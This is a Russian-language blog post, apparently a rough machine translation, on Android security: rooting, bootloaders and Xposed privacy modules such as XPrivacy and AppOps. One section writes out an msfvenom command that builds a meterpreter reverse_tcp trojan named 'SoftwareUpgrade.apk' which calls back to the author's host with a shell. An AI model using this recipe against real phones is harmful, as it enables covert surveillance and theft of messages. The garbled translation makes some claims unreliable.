✅ Android - Полное руководство по безопасности Android и Open Source

Введение в Android

Источник изображения: pixabay.com

Введение в Android

В этой теме мы собираемся узнать об Android и Open Source Security (OS). Android является платформой с открытым исходным кодом. Это очень похоже на Linux, но все же сильно отличается от Linux. Linux слишком зрелый по сравнению с Android. Итак, это Четан Наяк, и добро пожаловать в мой следующий блог по Open Source Web Security. Я написал этот блог, предполагая, что большинство из нас будет использовать Android K, то есть Kitkat или Android L, то есть Lollipop.

Причина в том, что у Gingerbread и Jellybean было много проблем безопасности с открытым исходным кодом, которые я не могу обсудить в этом единственном блоге. Так что, может быть, я буду обсуждать это в следующий раз, когда углублюсь в более старые версии Android. Итак, на данный момент давайте придерживаться KitKat и Lollipop.

Android был разработан для разработчиков. Средства управления безопасностью были разработаны, чтобы уменьшить нагрузку на разработчиков. Опытные разработчики могут легко работать и полагаться на гибкие средства управления безопасностью. Разработчики, менее знакомые с безопасностью, будут защищены безопасными значениями по умолчанию.

Начало

Я не сильно увлекался андроидом до позднего квартала 2013 года, когда у меня появился мой первый мобильный телефон Android, который был Sony Xperia L (на тот момент 4.2.2). Черт возьми, я даже ненавидел андроида, потому что он был чрезвычайно медленным, особенно устройства Samsung. Я даже тогда думал о покупке Windows Lumia, но, к счастью, я играл во многие игры, и мне пришлось покупать Xperia L, так как эта камера была Lag Proof. Было около 1 гигабайта оперативной памяти и Adreno 305. Достаточно круто, чтобы запустить что-нибудь.

После игры во многие игры, такие как NOVA3 и ModernCombat4, я устал от этой ячейки в течение месяца. Я знал, что Android основан на Linux, и я хотел сделать некоторые из моих модификаций для этого. Я начал читать о настройках и узнал о том, что называлось «Rooting». Поскольку у меня был хороший бэкхэнд в Linux, у меня не было проблемы с рутированием. С небольшой помощью XDA я смог успешно выкорчевать свою клетку.

Но потом что-то поразило меня. Как только моя ячейка перезапустилась после рутирования, она просто начала зацикливаться при загрузке (зависла на экране загрузки навсегда). Я даже не знал, что загрузчик был в Android. Так что я ничего не мог поделать. Прошло всего лишь один месяц с того момента, как я купил свою новую камеру, и моя камера теперь была из мягкого кирпича. Я всегда читал, что укоренение опасно, но я не знал, что это замурует мою камеру. Но я был неправ. Продолжая читать все, что касается рутирования, я узнал, что рутирование не влияет на ваш телефон.

Рутинг похож на «Доступ администратора» на компьютере (на самом деле это доступ к системе, но я написал «Доступ администратора», так что для нубов это легко понять). Это означает, что рутирование никогда не будет блокировать ваш телефон. Это был загрузчик, который заложил мой телефон. Для людей, которые не знают, загрузчик есть; загрузчик похож на BIOS в Windows. (Если вы не знаете, что такое BIOS, то вам даже не стоит думать о безопасности в первую очередь.) Bootloader или Hboot (так его называют в Android) - это первое, что запускается при загрузке Android устройство.

Он упаковывает инструкции для загрузки ядра операционной системы, и большинство из них специально предназначены для запуска собственной среды отладки или модификации.

Контрольная точка безопасности Android

Думайте о загрузчике как о контрольной точке безопасности вашего устройства. Если вы нарушите эту контрольную точку, вы потеряете все, что у вас есть на вашем телефоне. Так что это хорошая функция безопасности, говорю я. Потому что, если вы потеряете свой телефон, и кто-то попытается получить root-доступ, чтобы обойти блокировку (при условии, что вы заблокировали ваше устройство с помощью пин-кода или пароля), то ему обязательно придется разблокировать загрузчик, что приведет к стиранию ваших данных. на телефоне.

Таким образом, вам не нужно беспокоиться о том, что кто-то злоупотребит этим. Итак, аналогично обстоит дело с кастомными ПЗУ. ПЗУ - это операционные системы на основе версий Android, специально разработанные для вашей аппаратной архитектуры. Таким образом, если вы включите XDA для своего телефона, у вас будет n настроенных ПЗУ для ваших телефонов, некоторые из наиболее известных из которых - это ПЗУ Cyanogen Mod, которые уже имеют предварительные права и поставляются с предопределенным набором настроек.,

Превышение безопасности Android

Вы можете думать, что сейчас у вас есть безопасный мобильный телефон. Но я здесь, чтобы снова доказать, что вы не правы, и в этом весь смысл этого блога. Ко второму кварталу 2014 года люди уже начали разрабатывать эксплойты и руткиты для Android, которые могли бы рутировать ваши сотовые телефоны, даже не разблокируя загрузчики.

Не достаточно страшно? Позвольте мне рассказать вам самую опасную часть. Они могут даже установить трояны внутри этого. Таким образом, даже если полицейские смогут отследить камеру, и вы даже вернете свою камеру, существует высокий риск, что они смогут увидеть все, что вы делаете на вашем телефоне. Это то, что я попробовал в качестве эксперимента в реальной практической среде.

Я использовал Metasploit для этой атаки. Я создал троян и установил его в целевой телефон. Это был простой apk-файл, и я назвал его «Обновление программного обеспечения». Таким образом, если пользователь просто обычный человек, имеющий лишь побитовую информацию о безопасности, он даже не посмеет ее удалить. И я убедился, что всякий раз, когда активируется интернет, созданное мною вредоносное ПО автоматически запускается и подключается обратно к моему удаленному порту на хост-компьютере.

Для атаки использовались следующие команды (Metasploit - это программа для тестирования на проникновение, которая помогает в проверке уязвимостей на платформе или конкретных устройствах.)

IP-адрес моего хоста: 192.168.xx.xx

Порт моего хоста (для подключения обратно): 445

>>>msfvenom

>>> msfvenom android / meterpreter / reverse_tcp LHOST = 192.168.xx.xx LPORT = 445> SoftwareUpgrade.apk

Итак, здесь я создал обратный канал TCP на моем компьютере. Таким образом, каждый раз, когда интернет запускается на андроиде, я получаю оболочку, открытую на моей машине Kali или машине, на которой я установил Metasploit.

Итак, теперь вы знаете, насколько это страшно для человека, которого вы даже не знаете, у вас есть записи о каждой транзакции, которую вы делаете через свою ячейку, о каждом другом контакте, сообщениях WhatsApp, SMS, Viber и Skype, а также обо всем. Если это не страшно, тогда я не знаю что.

Рекомендуемые курсы

Сертификационный курс по Ruby Debugging
Полный курс PHP MySQL
Сертификационный онлайн-курс по программированию на VB.NET
Онлайн курс по ITIL Foundation

Покрытие

Достаточно о вопросах безопасности. Мы все знаем, что у любой другой платформы есть проблемы с безопасностью. Как мы можем быть в безопасности тогда? Это не совсем так. Платформы могут быть защищены до определенной точки, но после этого мы должны убедиться, что они остаются такими. В мире безопасности есть печально известная цитата:

«Социальная инженерия: потому что нет патча для человеческой глупости»

Я слышал эту фразу давным-давно, когда смотрел конференцию DefCon.

Когда нет технической уязвимости для использования, вы должны попытаться взломать людей. И под этим я не имею в виду гипнотизм и прочее. Я имею в виду социальную инженерию. Вы можете прочитать мой другой блог «Важность кибербезопасности в нашей повседневной жизни» для получения дополнительной информации об этом.

Основная функция безопасности Android

Кроме того, социальная инженерия, о которой можно позаботиться, только если вы умны; Есть способы, как вы можете разрабатывать приложения для Android безопасным способом, чтобы убедиться, что он остается таким.

Итак, вот некоторые из основных функций безопасности, которые помогают вам создавать безопасные приложения:

Песочница для приложений Android, которая изолирует данные вашего приложения и выполнение кода от других приложений.

Платформа приложения с надежными реализациями общих функций безопасности, таких как криптография, разрешения и безопасный IPC.

Зашифрованная файловая система, которая может быть включена для защиты данных на потерянных или украденных устройствах.

Предоставляемые пользователем разрешения для ограничения доступа к системным функциям и данным пользователя.

Определенные приложением разрешения для управления данными приложения для каждого приложения.

Что вы можете сделать, если вам нужна безопасная среда, но вы не разработчик?

Начиная с Android 5, т.е. Lollipop, он предоставляет функцию, при которой пользователь может добавлять несколько профилей и ограниченные режимы для использования телефонов и планшетов. Кроме того, если у вас есть рутированный телефон, в модулях Xposed есть приложения для Android, такие как AppOps, Xprivacy или Privacy Guard, которые помогут вам позаботиться практически обо всем. Для этого вам нужно установить Xposed Framework.

Xposed Framework - это то, что позволяет модулям Xposed работать. Модули Xposed позволяют изменять поведение файлов Apk и System без необходимости установки другого ПЗУ. Также легко отменить изменения, поэтому здесь мало риска, и это даже не отнимает много времени, поскольку нет необходимости прошивать несколько ПЗУ, ядер и их исправления ошибок.

Xprivacy, Privacy Guard и AppOps - это открытые модули, которые позволяют сделать ваш Android защищенным, выбрав, какое приложение должно иметь доступ к чему-либо, например, к Интернету, клавиатуре, SD-карте, корневому доступу и многим другим вещам. Вы даже можете отключить доступ только к определенным службам и создавать для этого шаблоны, определенные пользователем. Что касается меня, я предпочитаю выбирать Xprivacy. Но вот некоторая информация или различия, если вы позволите себе отличаться, чтобы выбрать между вышеупомянутыми тремя.

AppOps:

Это было первоначально введено Google в Android 4.3. (Это главная причина, по которой я не поддерживаю ее. Я не доверяю Google. Назовите это Паранойя, но Google отслеживает все, что вы делаете. И мне не нужен кто-то, кто следит за всем, что я делаю, но если вы доверяете Google, Действуй.). Основным ограничением AppOps является то, что Google позволяет блокировать доступ только к тем приложениям, которые он хочет заблокировать.

Это означает, что если вы хотите заблокировать приложения, связанные с Google, например Play Services (которые на самом деле потребляют более 50% вашей обычной памяти, батареи и данных (Интернет)), вы не сможете этого сделать. Это еще одна причина, по которой я ненавижу Google. Так что я считаю, что AppOps для меня - всего лишь вредоносная программа. (но я так думаю, это не так, если вы искренне доверяете Google)

Защита личных данных:

Privacy Guard - это простой в использовании интерфейс, сделанный взамен AppOps от Cyanogen Mod. Если вы новичок, то я предлагаю вам использовать это, так как у него есть только кнопка включения-выключения и самоопределяемые шаблоны относительно того, к какому типу приложений должен быть доступ к чему. Это не так безопасно, если есть вредоносная программа, которая действует или подражает, как системное приложение. Но это хорошо, чтобы вы начали.

Xprivacy:

Xprivacy - это инструмент «все в одном». Но это нацелено на экспертов. Вы можете сравнить его со швейцарским армейским ножом. Он имеет все в нем и может сделать ваш телефон безопасным любым другим способом, но если вы не знаете, что делаете, он только испортит ваш телефон и даже не запустит приложения. Вы также можете ограничить доступ к системным приложениям. Это то, что я лично предпочитаю выбирать.

Помимо вышеупомянутых модулей, в Xposed есть даже другие модули, такие как Lightening Firewall или BootManager, которые могут помочь ограничить доступ к Интернету для определенных приложений и не дать приложениям загружаться вместе с системой при перезагрузке телефона.

Так что это было бы для этого блога. В случае проблем с безопасностью вы можете посетить сайт XDA или стать участником сайта, который может предоставить вам гораздо больше информации о конфиденциальности.

Рекомендуемые статьи: -

Это было руководство по Android. Здесь мы обсудили базовую концепцию, контрольные точки безопасности и основные функции безопасности Android. Вы также можете просмотреть наши другие предлагаемые статьи, чтобы узнать больше -

Вопросы об интервью с Android - 10 самых полезных вопросов
8 полезных альтернатив Siri для Android
28 лучших советов и подсказок для инструментов разработки приложений для Android
Карьера в разработке Android

Категория:

Разработка программного обеспечения

Android - Полное руководство по безопасности Android и Open Source

Введение в Android

Начало

Контрольная точка безопасности Android

Превышение безопасности Android

Покрытие

Основная функция безопасности Android

Что вы можете сделать, если вам нужна безопасная среда, но вы не разработчик?

AppOps:

Защита личных данных:

Xprivacy:

Создай инновационный MS Project онлайн бесплатно - Пример - Строить планы

10 самых успешных вопросов и ответов на интервью Mulesoft

Mudbox против Zbrush - 5 основных и важных точек разницы

Скользящие средние в Excel (примеры) - Как рассчитать?

Моделирование автомобиля в 3ds Max - Блок проектирования и настройки для моделирования автомобилей

CentOS против Ubuntu - узнайте 5 самых значимых отличий

Генеральный директор против президента - Топ 6 лучших отличий (с инфографикой)

Формула центральной предельной теоремы - Калькулятор (шаблон Excel)

Джира против Редмине - Какой из них лучше (с инфографикой)

JList в Java - Конструкторы и часто используемые методы JList

JMeter Альтернативы - Топ 7 Список альтернатив JMeter с их особенностями

Джира против Гитхуба - Узнай 9 самых важных отличий

Введение в Android

Начало

Контрольная точка безопасности Android

Превышение безопасности Android

Покрытие

Основная функция безопасности Android

Что вы можете сделать, если вам нужна безопасная среда, но вы не разработчик?

AppOps:

Защита личных данных:

Xprivacy:

Читать дальше